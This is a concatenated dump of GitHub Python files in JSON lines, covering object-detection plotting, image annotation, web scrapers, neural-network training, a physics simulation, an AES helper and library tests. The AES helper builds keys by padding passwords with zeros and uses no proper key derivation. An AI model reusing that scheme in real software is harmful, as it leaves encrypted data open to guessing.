patches.Rectangle((y1, x1), box_h, box_w, linewidth=2, edgecolor=color, facecolor='none')\n ax.add_patch(bbox)\n plt.text(y1, x1, s=classes[labels[c] - 1], color='white', verticalalignment='top', bbox={'color': color, 'pad': 0})\nplt.axis('off')\n\n# Save image\nplt.savefig(\"output/ssd_result.jpg\", bbox_inches='tight', pad_inches=0.0)\nplt.show()\n","repo_name":"percent4/PyTorch_Learning","sub_path":"onnx_model_serving/ssd_model_predict_using_onnx_runtime_server.py","file_name":"ssd_model_predict_using_onnx_runtime_server.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"68"} +{"seq_id":"7648349661","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\nimport os\r\nimport natsort\r\n\r\nroot = Tk()\r\nroot.geometry(\"700x700\")\r\nroot.focus_set()\r\n\r\ninitial_tracklets_dir = \"\"\r\nmaster_list = []\r\ncurrent_image_in_folder_index = 0\r\ncurrent_snmot_index=0\r\ncurrent_folder_index=0\r\nmaster_list_txt_file_dir = \"\" \r\n\r\nsnmot_list=[]\r\ndef create_snmot_list():\r\n for snmot in os.listdir(initial_tracklets_dir):\r\n snmot_list.append(snmot)\r\ncreate_snmot_list()\r\n\r\nfolder_list=[]\r\ndef folder_list_in_a_snmot(current_snmot_index):\r\n folder_list.clear()\r\n snmot_name = snmot_list[current_snmot_index]\r\n for folder_no in os.listdir(initial_tracklets_dir+'/'+snmot_name):\r\n folder_list.append(folder_no)\r\n\r\ndef images_in_a_folder_of_a_snmot(current_folder_index, current_snmot_index):\r\n master_list.clear()\r\n snmot_name = snmot_list[current_snmot_index]\r\n folder_name = folder_list[current_folder_index]\r\n for folder_no in os.listdir(initial_tracklets_dir+'/'+snmot_name):\r\n for image in os.listdir(initial_tracklets_dir+'/'+snmot_name+'/'+folder_name):\r\n temp = ImageTk.PhotoImage(Image.open(initial_tracklets_dir+'/'+snmot_name+'/'+\r\n folder_name+'/'+image))\r\n master_list.append(temp)\r\n break\r\n\r\n##===== Initialization ========\r\nfolder_list_in_a_snmot(0)\r\nprint(folder_list)\r\nimages_in_a_folder_of_a_snmot(0, 0)\r\n##print(master_list)\r\n\r\nlabel = 
Label(image=master_list[0])\r\nlabel.grid(row=1, column=0, columnspan=3)\r\n##===== Initialization ========\r\n\r\ndef display_img(img_no):\r\n global label\r\n label = Label(image=master_list[img_no])\r\n label.grid(row=1, column=0, columnspan=3)\r\n\r\ndef image_forward(event):\r\n global current_image_in_folder_index\r\n \r\n label.grid_forget()\r\n current_image_in_folder_index += 1\r\n display_img(current_image_in_folder_index)\r\n\r\ndef folder_forward():\r\n global current_folder_index\r\n \r\n label.grid_forget()\r\n current_folder_index += 1\r\n images_in_a_folder_of_a_snmot(current_folder_index, current_snmot_index)\r\n display_img(0)\r\n\r\ndef snmot_forward(event):\r\n global current_snmot_index\r\n global current_folder_index\r\n label.grid_forget()\r\n\r\n current_snmot_index += 1\r\n folder_list_in_a_snmot(current_snmot_index)\r\n print(folder_list)\r\n current_folder_index = 0\r\n images_in_a_folder_of_a_snmot(0, current_snmot_index)\r\n display_img(0) \r\n\r\nT = Text(root, height = 2, width = 10)\r\n\r\ndef jersey_entry(event):\r\n jersey_number = T.get(\"1.0\", \"end\")\r\n with open(master_list_txt_file_dir, 'a') as f:\r\n f.write(jersey_number+\"\\n\")\r\n T.delete(\"1.0\", \"end\")\r\n\r\n## if current_snmot_index == len(folder_list):\r\n## snmot_forward()\r\n\r\n folder_forward()\r\n \r\nT.grid()\r\nroot.bind('', image_forward)\r\nroot.bind('', snmot_forward)\r\nroot.bind('', jersey_entry)\r\n\r\nroot.mainloop()","repo_name":"farhankhot/Video-Frame-Annotator","sub_path":"annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"21670485818","text":"import glob\nimport json\nimport os\nfrom collections import defaultdict\nfrom typing import DefaultDict\n\nfrom tbparse import SummaryReader\n\nOUTPUT_DIR = \"\"\n\n\n# mypy does not yet support recursive type hints\ndef nested_dict() -> DefaultDict[str, defaultdict]: # type: ignore[type-arg]\n \"\"\"Recursive defaultdict.\n\n Returns:\n a nested dictionary\n \"\"\"\n return defaultdict(nested_dict)\n\n\nif __name__ == \"__main__\":\n metrics = nested_dict()\n\n logs = os.path.join(OUTPUT_DIR, \"logs\", \"*\", \"version_*\", \"events*\")\n for log in glob.iglob(logs):\n hyperparams = log.split(os.sep)[-3]\n reader = SummaryReader(log)\n df = reader.scalars\n\n # Some event logs are for train/val, others are for test\n for split in [\"train\", \"val\", \"test\"]:\n rmse = df.loc[df[\"tag\"] == f\"{split}_RMSE\"]\n mae = df.loc[df[\"tag\"] == f\"{split}_MAE\"]\n if len(rmse):\n metrics[hyperparams][split][\"RMSE\"] = rmse.iloc[-1][\"value\"]\n if len(mae):\n metrics[hyperparams][split][\"MAE\"] = mae.iloc[-1][\"value\"]\n\n print(json.dumps(metrics, sort_keys=True, indent=4))\n","repo_name":"microsoft/torchgeo","sub_path":"experiments/torchgeo/find_optimal_hyperparams.py","file_name":"find_optimal_hyperparams.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1961,"dataset":"github-code","pt":"68"} +{"seq_id":"25577552102","text":"# From this reousrce - https://www.dataquest.io/blog/web-scraping-beautifulsoup/\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.imdb.com/search/title?release_date=2017&sort=num_votes,desc&page=1'\nresponse = get(url)\n\nhtml_soup = BeautifulSoup(response.text, 'html.parser')\n\nmovie_containers = html_soup.find_all('div', class_='lister-item mode-advanced')\n\nfirst_movie = 
movie_containers[0]\nfirst_movie_title = first_movie.h3.a.text\nfirst_movie_year = first_movie.find('span', class_='lister-item-year text-muted unbold').text\nfirst_movie_rating = float(first_movie.strong.text)\nfirst_movie_mscore = int(first_movie.find('span', class_='metascore favorable').text)\nfirst_movie_votes = int(first_movie.find('span', attrs={'name': 'nv'})['data-value'])\n\nprint(\n f'{first_movie_title} released in '\n f'{first_movie_year} with rating of '\n f'{first_movie_rating} and metascore of '\n f'{first_movie_mscore} with '\n f'{first_movie_votes} votes')\n\n# Actual scraping\nnames = []\nyears = []\nimdb_ratings = []\nmetascores = []\nvotes = []\n\nfor container in movie_containers:\n if container.find('div', class_='ratings-metascore') is not None:\n names.append(container.h3.a.text)\n years.append(container.find('span', class_='lister-item-year text-muted unbold').text)\n imdb_ratings.append(float(container.strong.text))\n metascores.append(int(container.find('span', class_='metascore').text))\n votes.append(int(container.find('span', attrs={'name': 'nv'})['data-value']))\n\nimport pandas as pd\n\ntest_df = pd.DataFrame(\n {\n 'movie': names,\n 'year': years,\n 'imdb': imdb_ratings,\n 'metascore': metascores,\n 'votes': votes\n }\n)\n\nprint(test_df.info())\nprint(test_df)\n\n# Save the dataframne\ntest_df.to_csv('./test.csv', index=False)\n\nblock = False\nif block:\n # URL Parameters to be used to hit different pages\n pages = [str(i) for i in range(1, 5)]\n years_url = [str(i) for i in range(2000, 2018)]\n\n # Control the crawl rate. We don't want to overload the server and risk\n # being blocked. To do this we use the time and sleep functions to mimic human\n # navigation behaviour\n from time import sleep, time\n from random import randint\n import os\n\n # Print the text and sleep for a random number of seconds\n # between 1 and 4\n for _ in range(0, 5):\n print('Blah')\n sleep(randint(1, 4))\n\n # Monitor progress\n # 1. Frequency of requests\n # 2. Number of requests\n # 3. 
Status code of requests\n\n start_time = time()\n requests = 0\n for _ in range(0, 5):\n # Insert request here\n requests += 1\n sleep(randint(1, 3))\n elapsed_time = time() - start_time\n print(f'Request: {requests}, Frequency: {requests/elapsed_time}')\n os.system('clear')\n\n\n\n","repo_name":"MOB83/12-days-web-scraper","sub_path":"data/imdb/web_scrape_tutorial.py","file_name":"web_scrape_tutorial.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42129891323","text":"import os\nimport torch\nfrom torch import optim\nimport torch.nn as nn\nimport numpy as np\nimport random\nfrom utils import json_file_to_pyobj\nfrom WideResNet import WideResNet\nfrom utils import adjust_learning_rate\nfrom tqdm import tqdm\n\n\ndef set_seed(seed=42):\n torch.backends.cudnn.deterministic = True\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n\ndef _train_seed(net, loaders, device, dataset, log=False, checkpoint=False, logfile='', checkpointFile=''):\n train_loader, test_loader = loaders\n\n if dataset.lower()=='cifar10':\n epochs = 200\n else:\n epochs=100\n\n epoch_thresholds=[int(x) for x in [0.3*epochs, 0.6*epochs, 0.8*epochs]]\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.9, nesterov=True, weight_decay=5e-4)\n\n best_test_set_accuracy = 0\n\n for epoch in tqdm(range(epochs)):\n\n net.train()\n for i, data in enumerate(train_loader, 0):\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n wrn_outputs = net(inputs)\n outputs = wrn_outputs[0]\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n optimizer = adjust_learning_rate(optimizer, epoch + 1, epoch_thresholds)\n\n if epoch >= epoch_thresholds[-1]:\n with torch.no_grad():\n\n correct = 0\n total = 0\n\n net.eval()\n for data in test_loader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n\n wrn_outputs = net(images)\n outputs = wrn_outputs[0]\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n epoch_accuracy = correct / total\n epoch_accuracy = round(100 * epoch_accuracy, 2)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Accuracy at epoch {} is {}%\\n'.format(epoch + 1, epoch_accuracy))\n\n if epoch_accuracy > best_test_set_accuracy:\n best_test_set_accuracy = epoch_accuracy\n if checkpoint:\n torch.save(net.state_dict(), checkpointFile)\n\n return best_test_set_accuracy\n\n\ndef train(args):\n json_options = json_file_to_pyobj(args.config)\n training_configurations = json_options.training\n\n wrn_depth = training_configurations.wrn_depth\n wrn_width = training_configurations.wrn_width\n dataset = training_configurations.dataset.lower()\n seeds = [int(seed) for seed in training_configurations.seeds]\n log = True if training_configurations.log.lower() == 'true' else False\n\n if log:\n logfile = training_configurations.logfile\n with open(logfile, 'w') as temp:\n temp.write('WideResNet-{}-{} scratch in {}\\n'.format(wrn_depth, wrn_width, training_configurations.dataset))\n else:\n logfile = ''\n\n checkpoint = True if training_configurations.checkpoint.lower() == 'true' else False\n\n if dataset.lower() == 'cifar10':\n\n from utils import cifar10loaders\n loaders = cifar10loaders()\n\n elif dataset.lower() == 'svhn':\n\n from utils import 
svhnLoaders\n loaders = svhnLoaders()\n else:\n raise ValueError('Datasets to choose from: CIFAR10 and SVHN')\n\n if torch.cuda.is_available():\n device = torch.device('cuda:0')\n else:\n device = torch.device('cpu')\n\n test_set_accuracies = []\n\n for seed in seeds:\n set_seed(seed)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('------------------- SEED {} -------------------\\n'.format(seed))\n\n strides = [1, 1, 2, 2]\n net = WideResNet(d=wrn_depth, k=wrn_width, n_classes=10, input_features=3, output_features=16, strides=strides)\n net = net.to(device)\n\n checkpointFile = 'wrn-{}-{}-seed-{}-{}-dict.pth'.format(wrn_depth, wrn_width, dataset, seed) if checkpoint else ''\n best_test_set_accuracy = _train_seed(net, loaders, device, dataset, log, checkpoint, logfile, checkpointFile)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Best test set accuracy of seed {} is {}\\n'.format(seed, best_test_set_accuracy))\n\n test_set_accuracies.append(best_test_set_accuracy)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Best test set accuracy of seed {} is {}\\n'.format(seed, best_test_set_accuracy))\n\n mean_test_set_accuracy, std_test_set_accuracy = np.mean(test_set_accuracies), np.std(test_set_accuracies)\n\n if log:\n with open(logfile, 'a') as temp:\n temp.write('Mean test set accuracy is {} with standard deviation equal to {}\\n'.format(mean_test_set_accuracy, std_test_set_accuracy))\n\n\nif __name__ == '__main__':\n import argparse\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n\n parser = argparse.ArgumentParser(description='WideResNet Scratches')\n\n parser.add_argument('-config', '--config', help='Training Configurations', required=True)\n\n args = parser.parse_args()\n\n train(args)\n","repo_name":"AlexandrosFerles/NIPS_2019_Reproducibilty_Challenge_Zero-shot_Knowledge_Transfer_via_Adversarial_Belief_Matching","sub_path":"src/PyTorch/train_scratches.py","file_name":"train_scratches.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"41990856102","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport decimal\nimport random\n\n# seq = [\"ACGT\" for i in range(160)]\n# seq = list(\"\".join(seq))\n# random.seed(10)\n# random.shuffle(seq) #random sequence\nseq = \"gttcaaggttacccatctcaagtagcctagcaacatttgcaacatcccaatggccctgtccttttctttactgatggccgtgctggtgctcagctacaaatccatctgttctctaggctgtgatctgcctcagacccacagcctgg\\\ngtaataggagggccttgatactcctggcacaaatgggaagaatctctcctttctcctgcctgaaggacagacatgactttggacttccccaggaggagtttgatggcaaccagttccagaagactcaagccatctctgtcctccatgagatgat\\\nccagcagaccttcaatctcttcagcacagaggactcatctgctgcttgggaacagagcctcctagaaaaattttccactgaactttaccagcaactgaataacctggaagcatgtgtgatacaggaggttgggatggaagagactcccctgatg\\\naatgaggactccatcctggctgtgaggaaatacttccaaagaatcactctttatctaacagagaagaaatacagcccttgtgcctgggaggttgtcagagcagaaatcatgagatctctctctttttcaacaaacttgcaaaaaatattaagga\\\nggaaggattgaaaactggttcaacatggcaatgatcctgattgactaatacattatctcacactttcatgagttcctccatttcaaagactcacttctataaccaccacgagttgaatcaaaattttcaaatgttttcagcagtgtaaagaagc\\\ngtcgtgtatacctgtgcaggcactagtactttacagatgaccatgctgatgtctctgttcatctatttatttaaatatttatttaattatttttaagatttaaattatttttttatgtaatatcatgtgtacctttacattgtggtgaatgtaac\\\naatatatgttcttcatatttagccaatatattaatttcctttttcattaaatttttactatac\".upper() #real sequence\n\ndx = 900\nR = {\"A\": 5.8, \"T\": 4.8, \"G\": 5.7, \"C\": 4.7}\nV = {\"A\": 2.09, \"T\": 
1.43, \"G\": 3.12, \"C\": 2.12}\nI = {\"A\": 7.61, \"T\": 4.86, \"G\": 8.22, \"C\": 4.11}\n\n\ndef in_cond(x):\n return 4 * math.atan(decimal.Decimal(-x + 10 + dx).exp()) - 4 * math.atan(decimal.Decimal(-x + dx).exp())\n\n\nf_llist = np.array([in_cond(i) for i in range(len(seq))])\n\ndf_llist = np.zeros(len(f_llist))\n\nff_list = np.array(list(zip(f_llist, df_llist)))\n\nXX = np.arange(len(ff_list))\n\n\ndef F(x, base):\n lst = []\n lst.clear()\n for i in range(len(x)):\n if i == 0:\n xx0 = 0\n xx1 = x[i, 0]\n xx2 = x[i + 1, 0]\n elif i == len(x) - 1:\n xx0 = x[i - 1, 0]\n xx1 = x[i, 0]\n xx2 = 0\n else:\n xx0 = x[i - 1, 0]\n xx1 = x[i, 0]\n xx2 = x[i + 1, 0]\n f = (((xx2 - xx1) / 0.65) * R[base] - 0.5 * np.sin(xx1)) * V[base] * 10 ** -1\n lst.append(f)\n x1 = list(x[:, 1])\n return np.array(list(zip(x1, lst)))\n\n\ndef RK4(x, base):\n h = XX[1] - XX[0]\n k1 = h * F(x, base)\n k2 = h * F(x + k1 / 2, base)\n k3 = h * F(x + k2 / 2, base)\n k4 = h * F(x + k3, base)\n X2 = x + ((k1 + 2 * k2 + 2 * k3 + k4) / 6)\n return X2\n\n\nres = RK4(ff_list, seq[1])\n\nress = list(res[:, 0])\nplt.ion()\nfig, ax = plt.subplots()\nfig.set_figwidth(10)\nline, = ax.plot(XX, ress)\nfor i in seq:\n res[:, 1] = 0\n res = RK4(res, i)\n ress = list(res[:, 0])\n ress.reverse()\n line.set_ydata(ress)\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ioff()\nplt.show()\n","repo_name":"IlDezmond/physics_algorithm","sub_path":"singord_ifna17.py","file_name":"singord_ifna17.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42899317471","text":"import requests\r\nimport parsel\r\nimport re\r\nimport csv\r\n\r\n\"\"\"\r\nQuery parameters:\r\n'ssdm': 'xx' select the province/city\r\ndwmc: xx select the institution directly\r\n'mldm': 'xx' degree category; professional degrees: zyxw\r\n'yjxkdm': 'xxxx' discipline category\r\nzymc: select the major\r\nxxfs: 1 full-time 2 part-time\r\n\"\"\"\r\nfirst_post_page = 0\r\nwith open('data.csv', mode='w', encoding='utf-8', newline='') as file:\r\n csv_writer = csv.writer(file)\r\n csv_writer.writerow(\r\n ['招生单位', '所在地', '研究生院', '自划线院校', '博士点',\r\n '考试方式', '院系所', '专业', '研究方向', '学习方式', '指导教师', '拟招生人数', '跨专业', '备注',\r\n '政治', '考试大纲', '英语', '考试大纲', '数学', '考试大纲', '专业课', '考试大纲',\r\n '政治', '考试大纲', '英语', '考试大纲', '数学', '考试大纲', '专业课', '考试大纲', ])\r\n\r\nurl = 'https://yz.chsi.com.cn/zsml/queryAction.do'\r\n\r\ndata = {\r\n 'ssdm': '11',\r\n 'dwmc': '',\r\n 'mldm': '08',\r\n 'mlmc': '',\r\n 'yjxkdm': '0812',\r\n 'zymc': '',\r\n 'xxfs': '1',\r\n 'pageno': str(first_post_page),\r\n}\r\n\r\nheaders = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'\r\n}\r\n\r\nresponse = requests.post(url=url, data=data, headers=headers)\r\nhtml_data = response.text\r\nselector = parsel.Selector(html_data)\r\n\r\nmax_page_num = int(selector.css('.zsml-page-box li:nth-last-child(3) a::text').get())\r\nprint(max_page_num)\r\n\r\nfor page in range(1, max_page_num + 1):\r\n print(page)\r\n data = {\r\n 'ssdm': '',\r\n 'dwmc': '',\r\n 'mldm': '08',\r\n 'mlmc': '',\r\n 'yjxkdm': '0801',\r\n 'zymc': '',\r\n 'xxfs': '',\r\n 'pageno': str(page),\r\n }\r\n response = requests.post(url=url, data=data, headers=headers)\r\n html_data = response.text\r\n selector = parsel.Selector(html_data)\r\n trs = selector.css('.ch-table tbody tr')\r\n\r\n for tr in trs:\r\n temp_writer = []\r\n temp_all = []\r\n school = tr.css('a::text').get()\r\n school_url = 'https://yz.chsi.com.cn/' + tr.css('a::attr(href)').get()\r\n city = tr.css('td:nth-child(2)::text').get()\r\n 
statue_1 = tr.css('td:nth-child(3) i::text').get()\r\n if not statue_1:\r\n statue_1 = ''\r\n else:\r\n statue_1 = '是'\r\n statue_2 = tr.css('td:nth-child(4) i::text').get()\r\n if not statue_2:\r\n statue_2 = ''\r\n else:\r\n statue_2 = '是'\r\n statue_3 = tr.css('td:nth-child(5) i::text').get()\r\n if not statue_3:\r\n statue_3 = ''\r\n else:\r\n statue_3 = '是'\r\n print(school, city, statue_1, statue_2, statue_3)\r\n\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n file.write(school + ',' + city + ',' + statue_1 + ',' + statue_2 + ',' + statue_3 + ',')\r\n\r\n temp_subject_Information = []\r\n\r\n response = requests.get(url=school_url, headers=headers)\r\n selector = parsel.Selector(response.text)\r\n trs = selector.css('.ch-table tbody tr')\r\n\r\n extent = selector.css('.ch-table tbody tr td:nth-child(1)::text').getall()\r\n\r\n Number_of_studies = len(extent)\r\n control_number = 1\r\n\r\n for tr in trs:\r\n form = tr.css('td:nth-child(1)::text').get()\r\n faculty = tr.css('td:nth-child(2)::text').get()\r\n speciality = tr.css('td:nth-child(3)::text').get()\r\n Research_Direction = tr.css('td:nth-child(4)::text').get()\r\n Styles = tr.css('td:nth-child(5)::text').get()\r\n teacher = tr.css('td:nth-child(6)::text').get().strip()\r\n people = tr.css('td:nth-child(7) script::text').get()\r\n transdisciplinary = tr.css('td:nth-child(9) a::text').get()\r\n remark = tr.css('td:nth-child(10) script::text').get()\r\n # try:\r\n # people = re.findall(\"专业:.*?',\", people, re.S)[0]\r\n # except:\r\n # try:\r\n # people = re.findall(\"研究方向:.*?,\", people, re.S)[0]\r\n # except:\r\n # try:\r\n # people = re.findall(\"一级学科:.*?,\", people, re.S)[0]\r\n # except:\r\n # people = re.findall(\"院系所:.*?,\", people, re.S)[0]\r\n remark = eval(re.findall(\"cutString(.*?),\", remark, re.S)[0].replace('(', ''))\r\n people: str\r\n people = people.split('cutString')[-1].replace(\"'\", '').split(',')[0].strip(\"(\")\r\n\r\n syllabus_url = 'https://yz.chsi.com.cn/' + tr.css('td:nth-child(8) a::attr(href)').get()\r\n print(form, faculty, speciality, Research_Direction, Styles, teacher, people, transdisciplinary, remark)\r\n\r\n temp_subject_Information.append(\r\n [form, faculty, speciality, Research_Direction, Styles, teacher, people, transdisciplinary, remark])\r\n\r\n response = requests.get(url=syllabus_url, headers=headers)\r\n selector = parsel.Selector(response.text)\r\n tds = selector.css('tbody.zsml-res-items td')\r\n for td in tds:\r\n politics = td.css('::text').get().strip()\r\n detail = td.css('span::text').get()\r\n print(politics, detail)\r\n\r\n temp_subject_Information.append([politics, detail])\r\n\r\n for i in temp_subject_Information:\r\n for k in i:\r\n temp_writer.append(k)\r\n\r\n temp_subject_Information.clear()\r\n\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n csv_writer = csv.writer(file)\r\n csv_writer.writerow(temp_writer)\r\n\r\n temp_writer.clear()\r\n\r\n # decide whether to write a new row\r\n if Number_of_studies == 1:\r\n pass\r\n else:\r\n if control_number == Number_of_studies:\r\n pass\r\n else:\r\n with open('data.csv', mode='a', encoding='utf-8', newline='') as file:\r\n file.write('' + ',' + '' + ',' + '' + ',' + '' + ',' + '' + ',')\r\n control_number += 1\r\n\r\n print('*' * 100)\r\n","repo_name":"Silfra-glacier/python_yzw_spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"20186307901","text":"from Cryptodome.Cipher import DES,AES\nfrom Cryptodome.Random import get_random_bytes\nimport random\nimport string\n\n#from project.main import decrypt\n\n\ndef make_key(key):\n if(len(key) < 16):\n new_key = key+((16-len(key))*'0')\n elif(len(key) > 16 and len(key) < 24):\n new_key = key+((24-len(key))*'0')\n elif(len(key) > 24 and len(key) < 32):\n new_key = key+((32-len(key))*'0')\n elif(len(key) > 32):\n new_key = key[0:32]\n else:\n new_key = key\n return bytes(new_key,\"utf8\")\n\ndef make_data(data):\n data = bytes(data,'utf8')\n if (len(data) % 16 != 0):\n new_data = (((len(data)//16 + 1)*16) - len(data)) * b'\\x00' + data\n return new_data\n else:\n return data\n\ndef remake_data(data):\n new_data = \"\"\n mark = '¿'\n out_of_range = False\n for ch in data:\n if(ch != 0):\n if(ch >= 33 and ch <=126):\n new_data += chr(ch)\n else:\n new_data += mark\n out_of_range = True\n if out_of_range:\n new_data = 'Error: wrong key'\n return(new_data)\n\n\ndef encrypt_AES(key_str, data_str):\n iv = get_random_bytes(16)\n key = make_key(key_str)\n data = make_data(data_str)\n aes = AES.new(key, AES.MODE_CBC, iv)\n encrypted = aes.encrypt(data)\n print(key, iv, encrypted)\n return [encrypted, iv]\n\ndef decrypt_AES(encrypted, key_str, iv):\n key = make_key(key_str)\n aes = AES.new(key, AES.MODE_CBC, iv)\n decrypted = aes.decrypt(encrypted)\n decrypted_data = remake_data(decrypted)\n print(key, iv, encrypted, decrypted)\n return decrypted_data\n\ndef test(): # usage example\n en = encrypt_AES('klucz','Korona123@!!')\n #print(en)\n res = decrypt_AES(en[0], 'klucz',en[1])\n print(res)\n\ndef get_random_password():\n source = string.ascii_letters + string.digits\n result_str = ''.join((random.choice(source) for i in range(16)))\n return result_str\n #print(result_str)\n\n#test()\n#get_random_password()\n\n","repo_name":"BKopysc/flask_secure_app","sub_path":"project/utils/cipher_util.py","file_name":"cipher_util.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72264842456","text":"\"\"\"Module for emeter container.\"\"\"\nimport logging\nfrom typing import Optional\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass EmeterStatus(dict):\n \"\"\"Container for converting different representations of emeter data.\n\n Newer FW/HW versions postfix the variable names with the used units,\n whereas the older ones do not have this feature.\n\n This class automatically converts between these two to allow\n backwards and forwards compatibility.\n \"\"\"\n\n @property\n def voltage(self) -> Optional[float]:\n \"\"\"Return voltage in V.\"\"\"\n try:\n return self[\"voltage\"]\n except ValueError:\n return None\n\n @property\n def power(self) -> Optional[float]:\n \"\"\"Return power in W.\"\"\"\n try:\n return self[\"power\"]\n except ValueError:\n return None\n\n @property\n def current(self) -> Optional[float]:\n \"\"\"Return current in A.\"\"\"\n try:\n return self[\"current\"]\n except ValueError:\n return None\n\n @property\n def total(self) -> Optional[float]:\n \"\"\"Return total in kWh.\"\"\"\n try:\n return self[\"total\"]\n except ValueError:\n return None\n\n def __repr__(self):\n return f\"\"\n\n def __getitem__(self, item):\n valid_keys = [\n \"voltage_mv\",\n \"power_mw\",\n \"current_ma\",\n \"energy_wh\",\n \"total_wh\",\n \"voltage\",\n \"power\",\n \"current\",\n \"total\",\n \"energy\",\n ]\n\n # 1. 
if requested data is available, return it\n if item in super().keys():\n return super().__getitem__(item)\n # otherwise decide how to convert it\n else:\n if item not in valid_keys:\n raise KeyError(item)\n if \"_\" in item: # upscale\n return super().__getitem__(item[: item.find(\"_\")]) * 1000\n else: # downscale\n for i in super().keys():\n if i.startswith(item):\n return self.__getitem__(i) / 1000\n\n _LOGGER.debug(f\"Unable to find value for '{item}'\")\n return None\n","repo_name":"python-kasa/python-kasa","sub_path":"kasa/emeterstatus.py","file_name":"emeterstatus.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":955,"dataset":"github-code","pt":"68"} +{"seq_id":"18783647753","text":"w_in_m = float(input())\nh_in_m = float(input())\n\nw_in_cm = w_in_m * 100\nh_in_cm = h_in_m * 100\n\nh_without_coridor = h_in_cm - 100\ncount_desk_in_row = h_without_coridor // 70\ncount_rows = w_in_cm // 120\n\ncount_places = count_desk_in_row * count_rows - 3\n\nprint(count_places)","repo_name":"mKasapova/my-repo","sub_path":"PycharmProjects/Exercise1/exercises/training_lab.py","file_name":"training_lab.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24665464439","text":"from __future__ import absolute_import\nfrom twisted.trial import unittest\nfrom twisted.internet.defer import inlineCallbacks\n\nfrom twistar.exceptions import ReferenceNotSavedError\n\nfrom .utils import Boy, Girl, tearDownDB, initDB, Registry, Comment, Category\nfrom .utils import User, Avatar, Picture, FavoriteColor, Nickname, Blogpost\nfrom six.moves import range\n\n\nclass RelationshipTest(unittest.TestCase):\n @inlineCallbacks\n def setUp(self):\n yield initDB(self)\n self.user = yield User(first_name=\"First\", last_name=\"Last\", age=10).save()\n self.avatar = yield Avatar(name=\"an avatar name\", user_id=self.user.id).save()\n self.picture = yield Picture(name=\"a pic\", size=10, user_id=self.user.id).save()\n self.favcolor = yield FavoriteColor(name=\"blue\").save()\n self.boy = yield Boy(name=\"Robert\").save()\n self.girl = yield Girl(name=\"Susan\").save()\n self.config = Registry.getConfig()\n\n\n @inlineCallbacks\n def tearDown(self):\n yield tearDownDB(self)\n\n\n @inlineCallbacks\n def test_polymorphic_get(self):\n bob = yield Nickname(value=\"Bob\", nicknameable_id=self.boy.id, nicknameable_type=\"Boy\").save()\n sue = yield Nickname(value=\"Sue\", nicknameable_id=self.girl.id, nicknameable_type=\"Girl\").save()\n\n nicknames = yield self.boy.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], bob)\n self.assertEqual(nicknames[0].value, bob.value)\n\n nicknames = yield self.girl.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], sue)\n self.assertEqual(nicknames[0].value, sue.value)\n\n boy = yield bob.nicknameable.get()\n self.assertEqual(boy, self.boy)\n\n girl = yield sue.nicknameable.get()\n self.assertEqual(girl, self.girl)\n\n\n @inlineCallbacks\n def test_polymorphic_set(self):\n nicknameone = yield Nickname(value=\"Bob\").save()\n nicknametwo = yield Nickname(value=\"Bobby\").save()\n yield self.boy.nicknames.set([nicknametwo, nicknameone])\n\n nicknames = yield self.boy.nicknames.get()\n self.assertEqual(len(nicknames), 2)\n # since the insert is asynchronous - two may have been inserted\n # before one\n if not nicknames[0] == nicknametwo:\n self.assertEqual(nicknames[0], 
